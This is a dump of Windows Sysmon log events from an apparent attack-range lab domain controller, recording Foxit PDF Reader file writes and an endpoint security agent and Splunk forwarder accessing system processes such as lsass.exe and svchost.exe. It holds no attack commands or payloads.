23542300x800000000000000041025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.850{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=2CD1D47A259CE82247ECDF2B3E75EFDF,SHA256=ECFEF3B9F8D663D098501BC56E84C022D5B361329F3A133077631CBB34846B2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.850{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_yrThRSnRIHVNZJLMD5=0266F5FD85DC144C92E0217258FF2639,SHA256=E25234C93F40E71D1509D8C3571AC13713ACF8C1ADDAD6B7BC66B3107F3A10F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000041020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.836{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=80CD1F840AC5E815606422D4907BD282,SHA256=D07932583E199303742785BE36933B7EC3F351AC95BAA9B721545AD4E633EB7E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.694{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.691{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.585{FE4C2B44-E3D3-63C7-1506-00000000AF02}46443844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.429{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E3D3-63C7-1506-00000000AF02}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.429{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.429{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.429{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.429{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.429{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E3D3-63C7-1506-00000000AF02}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.429{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E3D3-63C7-1506-00000000AF02}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.431{FE4C2B44-E3D3-63C7-1506-00000000AF02}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000040994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.351{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 